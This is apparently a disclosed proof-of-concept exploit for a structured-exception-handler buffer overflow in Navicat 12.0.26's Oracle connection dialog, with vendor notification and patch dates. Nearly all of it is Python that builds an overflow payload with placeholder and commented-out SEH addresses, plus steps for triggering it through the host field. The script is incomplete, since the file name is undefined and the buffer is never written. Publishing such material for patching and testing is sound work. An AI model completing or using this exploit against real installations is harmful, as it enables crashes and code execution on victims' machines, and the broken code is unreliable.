# Title: Navicat < 12.0.27 Oracle Connection Overflow
# Author: Kevin McGuigan
# Twitter: @_h3xagram
# Author Website: https://www.7elements.co.uk
# Vendor Website: https://www.navicat.com
# Date: 27/04/2018
# Version: 12.0.26
# Tested on Windows 7 32-bit
# Vendor notified on 04/04/2018. Patch issued on 25/04/2018.
# Generate file > Create new Oracle Connection > paste contents of "navicatPOC.txt" into host field and test connection to trigger overflow.
junk = "A" * 1502
#nseh = "\x4C\x4C\x77\x04"
#seh= "\x75\x2a\x01\x10"
nseh = "B" * 4
seh = "C" * 4
fill = "D" * 4000
buffer = junk + nseh + seh + fill
textfile = open(filename , 'w')
Navicat < 12.0.27 - Oracle Connection Overflow